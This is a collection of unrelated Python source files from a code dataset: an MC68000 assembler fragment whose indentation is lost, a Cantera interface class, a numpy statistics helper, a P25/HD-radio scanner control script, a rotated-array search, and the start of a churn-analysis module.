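# Illustrative return values for the size-suffix helpers above, derived directly
# from the code: each returns (operand size in bytes, encoded size field).
#   _s_light('addi.b') -> (1, 0)     _s_dark('move.b') -> (1, 1)
#   _s_light('addi.w') -> (2, 1)     _s_dark('move.w') -> (2, 3)
#   _s_light('addi.l') -> (4, 2)     _s_dark('move.l') -> (4, 2)
#   _s_middle('movea.w') -> (2, 0)   _s_middle('movea.l') -> (4, 1)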
class AssemblerMC68000(Assembler):
hex_prefixes = ('$',)
bin_prefixes = ('%',)
big_endian = True
def register_instructions(self):
self.register_instruction('RTS', b'\x4E\x75')
self.register_instruction('NOP', b'\x4E\x71')
def _mode(self, instr, start_index, offset, size, blacklist=()):
# first check the blacklist
for black_item in blacklist:
if black_item not in MODES:
raise InvalidMode(instr)
# Dn
found, index = instr.unbound_match(D_REGS, start=start_index)
if found and 'Dn' not in blacklist:
return index, 0, _reg(instr.tokens[start_index]), b''
# An
found, index = instr.unbound_match(A_REGS, start=start_index)
if found and 'An' not in blacklist:
return index, 1, _reg(instr.tokens[start_index]), b''
# (An)+ must be checked before (An) !
found, index = instr.unbound_match(
'(', A_REGS, ')', '+', start=start_index)
if found and '(An)+' not in blacklist:
return index, 3, _reg(instr.tokens[start_index+1]), b''
# (An)
found, index = instr.unbound_match('(', A_REGS, ')', start=start_index)
if found and '(An)' not in blacklist:
return index, 2, _reg(instr.tokens[start_index+1]), b''
# -(An)
found, index = instr.unbound_match(
'-', '(', A_REGS, ')', start=start_index)
if found and '-(An)' not in blacklist:
return index, 4, _reg(instr.tokens[start_index+2]), b''
# (d16, An)
found, index = instr.unbound_match(
'(', DISPLACEMENT, A_REGS, ')', start=start_index)
if found and '(d16,An)' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=2,
bits_size=16,
signed=True,
offset=2+offset)
return index, 5, _reg(instr.tokens[start_index+2]), pack_be16u(value)
# (d8, An, Xn)
found, index = instr.unbound_match(
'(', DISPLACEMENT, A_REGS, INDEXED_REG, ')', start=start_index)
if found and '(d8,An,Xn)' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=2,
bits_size=8,
bits=(7, 0),
signed=True,
offset=2+offset)
m, xn, s = _indexed_reg(instr.tokens[start_index+3])
return index, 6, _reg(instr.tokens[start_index+2]), pack_bits_be16u(0, ((15, 15), m), ((14, 12), xn), ((11, 11), s), ((7, 0), value))
# (d16, PC)
found, index = instr.unbound_match(
'(', DISPLACEMENT, 'PC', ')', start=start_index)
if found and '(d16,PC)' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=2,
bits_size=16,
relative=self.pc+2+offset,
offset=2+offset)
return index, 7, 2, pack_be16u(value)
# (d8, PC, Xn)
found, index = instr.unbound_match(
'(', DISPLACEMENT, 'PC', INDEXED_REG, ')', start=start_index)
if found and '(d8,PC,Xn)' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=2,
bits_size=8,
bits=(7, 0),
relative=self.pc+2+offset,
offset=2+offset)
m, xn, s = _indexed_reg(instr.tokens[start_index+3])
return index, 7, 3, pack_bits_be16u(0, ((15, 15), m), ((14, 12), xn), ((11, 11), s), ((7, 0), value))
# (xxx).w
found, index = instr.unbound_match(
'(', ABSOLUTE, ')', '.W', start=start_index)
if found and '(xxx).W' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=2,
bits_size=16,
offset=2+offset)
return index, 7, 0, pack_be16u(value)
# (xxx).l
found, index = instr.unbound_match(
'(', ABSOLUTE, ')', '.L', start=start_index)
if found and '(xxx).L' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index+1],
size=4,
bits_size=32,
offset=2+offset)
return index, 7, 1, pack_be32u(value)
# #imm
found, index = instr.unbound_match(IMMEDIATE, start=start_index)
if found and '#<data>' not in blacklist:
packed = self._packer(instr.tokens[start_index][1:], size, offset)
return index, 7, 4, packed
# (xxx).w ALIAS addr.w
found, index = instr.unbound_match(ABSOLUTE_W, start=start_index)
if found and '(xxx).W' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index][:-2],
size=2,
bits_size=16,
offset=2+offset)
return index, 7, 0, pack_be16u(value)
# (xxx).l ALIAS addr.l
found, index = instr.unbound_match(ABSOLUTE_L, start=start_index)
if found and '(xxx).L' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index][:-2],
size=4,
bits_size=32,
offset=2+offset)
return index, 7, 1, pack_be32u(value)
        # (xxx).l ALIAS [2] addr (defaults to 32-bit when no size suffix is given)
found, index = instr.unbound_match(ABSOLUTE, start=start_index)
if found and '(xxx).L' not in blacklist:
value = self.parse_integer_or_label(instr.tokens[start_index],
size=4,
bits_size=32,
offset=2+offset)
return index, 7, 1, pack_be32u(value)
raise InvalidMode(instr)
def _build_opcode(self, base, *args):
return pack_bits_be16u(base, *args)
def _packer(self, token, op_size, offset):
value = self.parse_integer_or_label(
token, size=op_size + (op_size % 2), bits_size=op_size*8, offset=2+offset)
packers = {1: pack_be16u, 2: pack_be16u, 4: pack_be32u}
return packers[op_size](value)
@opcode('move', 'move.w', 'move.b', 'move.l')
def _move(self, instr):
op_size, s = _s_dark(instr.tokens[0])
next_index, src_m, src_xn, src_data = self._mode(instr, 1, 0, op_size)
# convert to MOVEA
if op_size in (2, 4) and instr.match(A_REGS, start=next_index):
return self._build_opcode(0b0000000001000000, ((13, 12), s), ((11, 9), _reg(instr.tokens[next_index])), ((5, 3), src_m), ((2, 0), src_xn)) + src_data
_, dst_m, dst_xn, dst_data = self._mode(
instr, next_index, len(src_data), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000000000000000, ((13, 12), s), ((11, 9), dst_xn), ((8, 6), dst_m), ((5, 3), src_m), ((2, 0), src_xn)) + src_data + dst_data
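    # Worked example (hand-assembled as a sanity check, not produced by running
    # this code): "move.w d0, (a1)" selects s=3 (word), dst_xn=1, dst_m=2,
    # src_m=0, src_xn=0, giving 0b0011001010000000 = $3280, the standard
    # 68000 encoding of MOVE.W D0,(A1).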
@opcode('movea', 'movea.w', 'movea.l')
def _movea(self, instr):
op_size, s = _s_dark(instr.tokens[0])
next_index, src_m, src_xn, src_data = self._mode(instr, 1, 0, op_size)
if instr.match(A_REGS, start=next_index):
return self._build_opcode(0b0000000001000000, ((13, 12), s), ((11, 9), _reg(instr.tokens[next_index])), ((5, 3), src_m), ((2, 0), src_xn)) + src_data
@opcode('ori', 'ori.w', 'ori.b', 'ori.l')
def _ori(self, instr):
if instr.match(IMMEDIATE, 'CCR'):
packed = self._packer(instr.tokens[1][1:], 1, 0)
return self._build_opcode(0b0000000000111100) + packed
if instr.match(IMMEDIATE, 'SR'):
packed = self._packer(instr.tokens[1][1:], 2, 0)
return self._build_opcode(0b0000000001111100) + packed
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000000000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('andi', 'andi.w', 'andi.b', 'andi.l')
def _andi(self, instr):
if instr.match(IMMEDIATE, 'CCR'):
packed = self._packer(instr.tokens[1][1:], 1, 0)
return self._build_opcode(0b0000001000111100) + packed
if instr.match(IMMEDIATE, 'SR'):
packed = self._packer(instr.tokens[1][1:], 2, 0)
return self._build_opcode(0b0000001001111100) + packed
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000001000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('subi', 'subi.w', 'subi.b', 'subi.l')
def _subi(self, instr):
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000010000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('addi', 'addi.w', 'addi.b', 'addi.l')
def _addi(self, instr):
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000011000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('eori', 'eori.w', 'eori.b', 'eori.l')
def _eori(self, instr):
if instr.match(IMMEDIATE, 'CCR'):
packed = self._packer(instr.tokens[1][1:], 1, 0)
return self._build_opcode(0b0000101000111100) + packed
if instr.match(IMMEDIATE, 'SR'):
packed = self._packer(instr.tokens[1][1:], 2, 0)
return self._build_opcode(0b0000101001111100) + packed
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000101000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('cmpi', 'cmpi.w', 'cmpi.b', 'cmpi.l')
def _cmpi(self, instr):
found, index = instr.unbound_match(IMMEDIATE)
if found:
op_size, s = _s_light(instr.tokens[0])
packed = self._packer(instr.tokens[1][1:], op_size, 0)
_, dst_m, dst_xn, dst_data = self._mode(
instr, index, op_size + (op_size % 2), op_size, blacklist=('An', '#<data>', '(d16,PC)', '(d8,PC,Xn)'))
return self._build_opcode(0b0000110000000000, ((7, 6), s), ((5, 3), dst_m), ((2, 0), dst_xn)) + packed + dst_data
@opcode('jmp')
def _jmp(self, instr):
_, src_m, src_xn, src_data = self._mode(
instr, 1, 0, 0, blacklist=('Dn', 'An', '(An)+', '-(An)', '#<data>'))
return self._build_opcode(0b0100111011000000, ((5, 3), src_m), ((2, 0), src_xn)) + src_data
@opcode('lea', 'lea.l')
def _lea(self, instr):
next_index, src_m, src_xn, src_data = self._mode(
instr, 1, 0, 4, blacklist=('Dn', 'An', '(An)+', '-(An)', '#<data>'))
if instr.match(A_REGS, start=next_index):
return self._build_opcode(0b0100000111000000, ((11, 9), _reg(instr.tokens[next_index])), ((5, 3), src_m), ((2, 0), src_xn)) + src_data
@opcode('bhi', 'bls', 'bcc', 'bcs', 'bne', 'beq', 'bvc', 'bvs', 'bpl', 'bmi', 'bge', 'blt', 'bgt', 'ble',
'bhi.b', 'bls.b', 'bcc.b', 'bcs.b', 'bne.b', 'beq.b', 'bvc.b', 'bvs.b', 'bpl.b', 'bmi.b', 'bge.b', 'blt.b', 'bgt.b', 'ble.b',
'bhi.w', 'bls.w', 'bcc.w', 'bcs.w', 'bne.w', 'beq.w', 'bvc.w', 'bvs.w', 'bpl.w', 'bmi.w', 'bge.w', 'blt.w', 'bgt.w', 'ble.w'
)
def _bcc(self, instr):
if instr.match(DISPLACEMENT):
condition = _cond(instr.tokens[0][1:])
op_size, _ = _s_dark(instr.tokens[0])
if op_size == 1:
value = self.parse_integer_or_label(instr.tokens[1],
size=2,
bits_size=8,
bits=(7, 0),
alignment=2, # here is safe to check for alignment
relative=self.pc+2)
return self._build_opcode(0b0110000000000000, ((11, 8), condition), ((7, 0), value))
elif op_size == 2:
value = self.parse_integer_or_label(instr.tokens[1],
size=2,
bits_size=16,
alignment=2, # here is safe to check for alignment
offset=2,
relative=self.pc+2)
return self._build_opcode(0b0110000000000000, ((11, 8), condition)) + pack_be16u(value)
@opcode('dbt', 'dbf', 'dbra', 'dbhi', 'dbls', 'dbcc', 'dbcs', 'dbne', 'dbeq', 'dbvc', 'dbvs', 'dbpl', 'dbmi', 'dbge', 'dblt', 'dbgt', 'dble',
'dbt.w', 'dbf.w', 'dbra.w', 'dbhi.w', 'dbls.w', 'dbcc.w', 'dbcs.w', 'dbne.w', 'dbeq.w', 'dbvc.w', 'dbvs.w', 'dbpl.w', 'dbmi.w', 'dbge.w', 'dblt.w', 'dbgt.w', 'dble.w'
)
def _dbcc(self, instr):
if instr.match(D_REGS, DISPLACEMENT):
condition = _cond(instr.tokens[0][2:])
d_reg = _reg(instr.tokens[1])
value = self.parse_integer_or_label(instr.tokens[2],
size=2,
bits_size=16,
alignment=2, # here is safe to check for alignment
offset=2,
relative=self.pc+2)
return self._build_opcode(0b0101000011001000, ((11, 8), condition), ((2, 0), d_reg)) + pack_be16u(value)
@opcode('jsr')
def _jsr(self, instr):
_, src_m, src_xn, src_data = self._mode(
instr, 1, 0, 0, blacklist=('Dn', 'An', '(An)+', '-(An)', '#<data>'))
return self._build_opcode(0b0100111010000000, ((5, 3), src_m), ((2, 0), src_xn)) + src_data
if __name__ == '__main__':
AssemblerMC68000.main()
|
StarcoderdataPython
|
8189563
|
"""millilauncher - A minimalist, line-oriented Minecraft launcher"""
__author__ = '<NAME> <<EMAIL>>'
|
StarcoderdataPython
|
9688807
|
<reponame>VishalKandala/Cantera-1.7
import string
import os
from constants import *
from SurfacePhase import SurfacePhase, EdgePhase
from Kinetics import Kinetics
import XML
__revision__ = "$Id: Interface.py,v 1.7 2006/05/03 19:46:28 dggoodwin Exp $"
class Interface(SurfacePhase, Kinetics):
"""
Two-dimensional interfaces.
Instances of class Interface represent reacting 2D interfaces
between bulk 3D phases. Class Interface defines no methods of its
own. All of its methods derive from either SurfacePhase or Kinetics.
Function importInterface should usually be used to build an
Interface object from a CTI file definition, rather than calling
the Interface constructor directly.
See: SurfacePhase, Kinetics, importInterface
"""
def __init__(self, src="", root=None, phases=[]):
"""
src - CTML or CTI input file name. If more than one phase is
        defined in the file, src should be specified as 'filename#id'
If the file is not CTML, it will be run through the CTI -> CTML
preprocessor first.
root - If a CTML tree has already been read in that contains
the definition of this interface, the root of this tree can be
specified instead of specifying 'src'.
phases - A list of all objects representing the neighboring phases
which participate in the reaction mechanism.
"""
self.ckin = 0
self._owner = 0
self.verbose = 1
# src has the form '<filename>#<id>'
fn = src.split('#')
id = ""
if len(fn) > 1:
id = fn[1]
fn = fn[0]
# read in the root element of the tree if not building from
# an already-built XML tree. Enable preprocessing if the film
# is a .cti file instead of XML.
if src and not root:
root = XML.XML_Node(name = 'doc', src = fn, preprocess = 1)
# If an 'id' tag was specified, find the node in the tree with
# that tag
if id:
s = root.child(id = id)
# otherwise, find the first element with tag name 'phase'
        # (both 2D and 3D phases use the CTML tag name 'phase')
else:
s = root.child(name = "phase")
# build the surface phase
SurfacePhase.__init__(self, xml_phase=s)
# build the reaction mechanism. This object (representing the
# surface phase) is added to the end of the list of phases
Kinetics.__init__(self, xml_phase=s, phases=phases+[self])
def __del__(self):
"""Delete the Interface instance."""
Kinetics.__del__(self)
SurfacePhase.__del__(self)
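# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# The class docstring recommends importInterface for building Interface objects;
# the direct construction below is only a minimal example. The CTI file name,
# phase id and bulk-phase objects are placeholders (importPhase stands for
# however the neighboring bulk phases are actually constructed) and must match
# whatever input file is really available.
#
# from Cantera import importPhase
# gas = importPhase('diamond.cti', 'gas')
# bulk = importPhase('diamond.cti', 'diamond')
# surf = Interface(src='diamond.cti#diamond_100', phases=[gas, bulk])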
|
StarcoderdataPython
|
3590617
|
<reponame>zen4prof/FreeCodeCamp_Data_Analysis_with_Python-main
import numpy as np
def calculate(numbers):
if len(numbers) != 9:
raise ValueError("List must contain nine numbers.")
data = np.reshape(np.array(numbers),(3,3))
calculations = {}
calculations['mean'] = [np.mean(data, axis=0).tolist(), np.mean(data, axis=1).tolist(), np.mean(data.flatten()).tolist()]
calculations['variance'] = [np.var(data, axis=0).tolist(), np.var(data, axis=1).tolist(), np.var(data.flatten()).tolist()]
calculations['standard deviation'] = [np.std(data, axis=0).tolist(), np.std(data, axis=1).tolist(), np.std(data.flatten()).tolist()]
calculations['max'] = [np.max(data, axis=0).tolist(), np.max(data, axis=1).tolist(), np.max(data.flatten()).tolist()]
calculations['min'] = [np.min(data, axis=0).tolist(), np.min(data, axis=1).tolist(), np.min(data.flatten()).tolist()]
calculations['sum'] = [np.sum(data, axis=0).tolist(), np.sum(data, axis=1).tolist(), np.sum(data.flatten()).tolist()]
return calculations
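# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# calculate() expects exactly nine numbers and reports each statistic along
# axis 0, along axis 1 and for the flattened 3x3 matrix.
if __name__ == "__main__":
    stats = calculate([0, 1, 2, 3, 4, 5, 6, 7, 8])
    print(stats["mean"])  # [[3.0, 4.0, 5.0], [1.0, 4.0, 7.0], 4.0]
    print(stats["sum"])   # [[9, 12, 15], [3, 12, 21], 36]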
|
StarcoderdataPython
|
4989014
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:mod:`musk`
===========
.. module:: musk
:platform: Unix, Windows
:synopsis:
.. moduleauthor:: hbldh <<EMAIL>>
Created on 2015-11-06, 14:11
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from pkg_resources import resource_filename
import numpy as np
__all__ = ['MUSK1', 'MUSK2']
class _MUSK(object):
def __init__(self, id_):
self.name = None
data, self._names, self.info = _read_musk_data(id_)
self.data, self.labels, \
(self.molecule_names, self.conformation_names) = _parse_musk_data(data)
unique_bag_ids = np.unique(self.labels)
self.bag_labels = np.zeros((max(np.abs(unique_bag_ids)) + 1,), 'int')
self.bag_labels[np.abs(unique_bag_ids)] = np.sign(unique_bag_ids)
self.bag_labels = self.bag_labels[1:]
self.bag_partitioning = np.cumsum(np.bincount(np.abs(self.labels))[1:])[:-1]
def __str__(self):
return "{0} - {1} instances with {2} features. {3} Musks, {4} Non-musks".format(
self.name, self.data.shape[0], self.data.shape[1],
len(np.unique(self.labels[self.labels > 0])),
len(np.unique(self.labels[self.labels < 0])))
def __repr__(self):
return str(self)
def __unicode__(self):
return str(self)
class MUSK1(_MUSK):
def __init__(self):
super(MUSK1, self).__init__(1)
self.name = 'MUSK "Clean1" database'
class MUSK2(_MUSK):
def __init__(self):
super(MUSK2, self).__init__(2)
self.name = 'MUSK "Clean2" database'
def _read_musk_data(id_):
with open(resource_filename('skboost.datasets.musk',
'clean{0}.data'.format(id_)), mode='r') as f:
data = f.readlines()
with open(resource_filename('skboost.datasets.musk',
'clean{0}.names'.format(id_)), mode='r') as f:
names = f.readlines()
with open(resource_filename('skboost.datasets.musk',
'clean{0}.info'.format(id_)), mode='r') as f:
info = f.read()
return data, names, info
def _parse_musk_data(data):
molecule_names = []
conformation_names = []
f = []
labels = []
bag_id = 0
for row in data:
items = row.strip('\n').split(',')
if items[0] not in molecule_names:
molecule_names.append(items[0])
bag_id += 1
labels.append(int(bag_id * ((float(items[-1]) * 2) - 1)))
conformation_names.append(items[1])
f.append(list(map(float, items[2:-1])))
return np.array(f), np.array(labels), (molecule_names, conformation_names)
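# --- Illustrative usage sketch (added for clarity; not part of the original file) ---
# Instantiating MUSK1 assumes the skboost package with its bundled
# clean1.data / clean1.names / clean1.info resources is installed; otherwise
# resource_filename() will raise.
if __name__ == "__main__":
    musk1 = MUSK1()
    print(musk1)                 # summary string from __str__
    print(musk1.data.shape)      # (conformations, features)
    print(musk1.bag_labels[:5])  # +1 / -1 label per bag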
|
StarcoderdataPython
|
1966847
|
<filename>pi/bin/scan_client1.py
#!/usr/bin/python
################################################################################
#second version of the scanner client supporting P25
#
#TRUNK key sets to local P25 public safety
#DATA key shows IP address
#SRCH turns on NRSC5 decode
#MUTE does a shutdown
#
#receives output from modified op25 code via mqtt
#other side is
#mosquitto_sub -h localhost -t 'mqtt/p25'
#test with
#mosquitto_pub -h localhost -t 'mqtt/p25' -m "01/15/22 18:47:02.949287 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=0, src_addr=0x233fde"
#
#added this to crontab
#@reboot /usr/bin/screen -d -m -S fpclient /home/timc/bct8-upgrade/pi/bin/scan_client1.py
################################################################################
#pip install paho-mqtt
################################################################################
import socket, sys
import time
import os
import signal
import serial
import re
import subprocess
import shlex
#mqtt stuff
import paho.mqtt.client as mqttClient
Connected = False
broker = "localhost"
hd_audio_channel = -1
PID = 0
#open serial port
ser = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)
frequency = 146520000
current_state = 'idle'
start_time = time.time()
################################################################################
################################################################################
def read_loop():
global start_time
global current_state
#open serial port
state = 0
candidate_frequency = "00000000"
while True:
if ((time.time() > (start_time + 20)) & (current_state == 'idle')):
print("default trunk1 after 20s")
ser.write("!MRN\r\n")
current_state = "trunk1"
trunk1()
data = ser.readline()[:-2] # get rid of newline cr
if data:
print data
#check if a number -- if so this is a frequency
if re.match(r"[0-9]", data):
state = 1
print "number"
candidate_frequency+=str(data)
candidate_frequency = candidate_frequency[-7:]
mhz = candidate_frequency[:3]
ltmhz = candidate_frequency[-4:]
#print mhz + "." + ltmhz
print candidate_frequency
ser.write("#" + mhz + "." + ltmhz + "\r\n")
#this seems OK but arduino has problems with leading zero?
if (data == "E"):
# user says this is a frequency
frequency = int(candidate_frequency)
print "frequency is:"
print frequency
if frequency < 100000:
frequency = frequency * 1000
print "lt"
else:
frequency = frequency * 100
print "gt"
candidate_frequency = "00000000"
#udp call
udp_send("freq", frequency)
if (data == "M"):
#shutdown
time.sleep(1)
ser.write("OFF\r\n")
time.sleep(1)
os.system("/home/timc/stop-radio")
if (data == "M"):
ser.write("!HAM\r\n")
if (data == "k"):
ser.write("!MRN\r\n")
current_state = "trunk1"
trunk1()
if (data == "U"):
ser.write("146\r\n")
if (data == "D"):
ser.write("#146.520\r\n")
if (data == "r"):
nrsc5()
if (data == "d"):
#depends on route out but whatever
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
octets = s.getsockname()[0].split('.')
ser.write('@\r\n')
ser.write(octets[0].ljust(3))
ser.write('\r\n')
time.sleep(1)
ser.write(octets[1].ljust(3))
ser.write('\r\n')
time.sleep(1)
ser.write(octets[2].ljust(3))
ser.write('\r\n')
time.sleep(1)
ser.write(octets[3].ljust(3))
ser.write('\r\n')
time.sleep(1)
ser.write('@\r\n')
################################################################################
# main
################################################################################
def main():
setup()
mqtt_init()
read_loop()
################################################################################
# setup
################################################################################
def setup():
ser.write("@\r\n")
################################################################################
#mqtt init
################################################################################
def mqtt_init():
client = mqttClient.Client("Python")
client.on_message = on_message
client.on_connect = on_connect
client.connect(broker, port=1883)
client.loop_start()
while Connected != True:
print "not connected"
time.sleep(0.1)
print client.subscribe('mqtt/p25')
################################################################################
# nrsc5
# HD audio
# this doesn't die - need to do better with process crap
################################################################################
def nrsc5():
global hd_audio_channel
global PID
hd_audio_channel = hd_audio_channel + 1
if (hd_audio_channel == 3):
hd_audio_channel = 0
ch = str(hd_audio_channel)
ser.write("HD" + ch + "\r\n")
print "hda " + ch
if (PID):
os.kill(PID, signal.SIGTERM)
PID = subprocess.Popen(['/usr/local/bin/nrsc5', '88.7', ch])
################################################################################
# trunk1
# start the trunking process via shell script
################################################################################
def trunk1():
global PID
time.sleep(1)
ser.write("#152.7250\r\n")
time.sleep(1)
ser.write("!WX\r\n")
if (PID):
os.kill(PID, signal.SIGTERM)
PID = subprocess.Popen('/home/timc/op25.sh')
################################################################################
#mqtt stuff
#to test without traffic
#mosquitto_pub -h localhost -t 'mqtt/p25' -m "01/15/22 18:47:02.949287 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=0, src_addr=0x233fde"
################################################################################
def on_message(client, userdata, message):
#print "Message received: " + message.payload
#somewhere in here parse the strings from op25
#print type(message.payload)
#01/15/22 18:47:02.949287 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=0, src_addr=0x233fde
#01/15/22 18:47:03.313039 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=0, src_addr=0x233fde
#01/15/22 18:47:03.373206 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=15, src_addr=0x233fde
#01/15/22 18:47:04.207448 [0] NAC 0x230 LCW: ec=0, pb=0, sf=0, lco=0, src_addr=0x0059db
#characters = [chr(ascii) for ascii in message.payload] #convert ascii to char
#char_join = ''.join(characters)
#if this is the local sheriff
if re.match(r".+NAC 0x230", message.payload):
#print message.payload.split("=")
r = message.payload.split("=")
show_last_call(r[5][2:])
################################################################################
#show_last_call
#this should be a file someday
#1 - 49 County Sheriff's Office
#'2318c9': -- 27
#50 - 51 County Emergency Management
#70 - 79 Monticello Police Department
#'2333cd' -- 77 monticello
#80 - 89 New Glarus Police Department
#90 - 95 Brooklyn Police Department
#96 - 99 County Coroner's Office
#100 - 199 Brodhead Police Department
#200 - 299 Monroe Police Department
#300 - 324 County Sheriff's Office (Part-Time Employees)
#325 - 326 County Humane Society
#400 - 499 Albany Police Department
#720 - 729 Brodhead Fire Department
#740 - 749 Juda Community Fire Department
#750 - 759 Monroe Fire Department (Apparatus)
#800 - 899 County EMS Units
#6100 - 6199 Belleville Police Department
#7500 - 7599 Monroe Fire Department (Personnel)
# '326a41': 'BLN', -- blanchardville
#################################################################################
def show_last_call(radio_id):
radio_id = radio_id.strip()
dict = {
'000001': 'UNK',
'0059da': 'DSP',
'0059db': 'DSP',
'0059dc': 'DSP',
'0059d9': 'DSP',
'2318c7': 'S10',
'2318c9': 'S27',
'2318ca': 'S17',
'2318d1': 'S04',
'2318d2': 'S05',
'2318d9': 'S31',
'23ce06': 'NG2',
'23ce08': 'NG1',
'23cc14': 'NG4',
'23ce07': 'NG4',
'2333bd': 'MON',
'2333cc': 'MCL',
'2333cd': 'MCL',
'233fde': 'foo',
'326a41': 'BLN',
'16777215': 'ALB'
}
if dict.get(radio_id):
print "heard: " + radio_id + ": " + dict.get(radio_id)
ser.write(dict.get(radio_id) + "\r\n")
else:
print "unknown RID:" + radio_id + ":"
ser.write("UNK\r\n")
################################################################################
#mqtt on_connect
################################################################################
def on_connect(client, userdata, flags, rc):
if rc == 0:
print("Connected to broker")
global Connected
Connected = True
else:
print("Connection failed")
################################################################################
# udp_send -- almost an exact copy of udpclient.py
################################################################################
def udp_send(mode, data):
#open network
print "programming:"
print data
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("localhost", 6020))
buf = ""
if mode == 'freq':
buf = buf + chr(0)
print "sending freq"
print data
print "--"
data = int(data)
i=0
while i < 4:
buf = buf + chr(data & 0xff)
data = data >> 8
i = i + 1
s.send(buf)
s.close()
return
################################################################################
# scanner class
################################################################################
class Scanner:
frequency = 146520000
def __init__(self, name):
self.name = name
################################################################################
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1861600
|
# Given an array of numbers which is sorted in ascending order and also rotated by some arbitrary number,
# find if a given ‘key’ is present in it.
# Write a function to return the index of the ‘key’ in the rotated array.
# If the ‘key’ is not present, return -1. You can assume that the given array does not have any duplicates.
# Example:
# Input: [10, 15, 1, 3, 8], key = 15
# Output: 1
# Explanation: '15' is present in the array at index '1'.
# O(logN) space:O(1)
def search_in_rotated_array(arr, key):
if len(arr) == 0:
return -1
start, end = 0, len(arr) - 1
while start <= end:
mid = start + (end - start) // 2
if arr[mid] == key:
return mid
if arr[start] <= arr[mid]:
if key >= arr[start] and key < arr[mid]:
end = mid - 1
else:
start = mid + 1
else:
if key > arr[mid] and key <= arr[end]:
start = mid + 1
else:
end = mid - 1
return -1
print(search_in_rotated_array([10, 15, 1, 3, 8], 15))
print(search_in_rotated_array([4, 5, 7, 9, 10, -1, 2], 10))
# follow up: How do we search in a sorted and rotated array that also has duplicates?
print(search_in_rotated_array([3, 7, 3, 3, 3], 7))
# best: O(logN) worst:O(N) space:O(1)
def search_in_rotated_duplicate_array(arr, key):
if len(arr) == 0:
return -1
start, end = 0, len(arr) - 1
while start <= end:
mid = start + (end - start) // 2
if arr[mid] == key:
return mid
if arr[start] == arr[mid] and arr[end] == arr[mid]:
start += 1
end -= 1
if arr[start] <= arr[mid]:
if key >= arr[start] and key < arr[mid]:
end = mid - 1
else:
start = mid + 1
else:
if key > arr[mid] and key <= arr[end]:
start = mid + 1
else:
end = mid - 1
return -1
print(search_in_rotated_duplicate_array([3, 7, 3, 3, 3], 7))
|
StarcoderdataPython
|
1935066
|
<gh_stars>1-10
"""
libraries
"""
# import shap
import joblib
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pandas_profiling
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.metrics import classification_report
import logging
import constants
logging.basicConfig(
level=logging.INFO,
filename="logs/churn_library.log",
format="%(asctime)-15s %(message)s",
)
logger = logging.getLogger()
def import_data(path):
"""
returns dataframe for the csv found at path
input:
path: a path to the csv
output:
df: pandas dataframe
"""
df = pd.read_csv(path)
return df.iloc[:, 2:]
def perform_eda(df, output_path):
"""
perform eda on df and save figures to images folder
input:
df: pandas dataframe
output_path: path to store the eda report
output:
None
"""
profile = pandas_profiling.ProfileReport(df)
profile.to_file(output_path)
def scaler(df, quant_columns):
"""
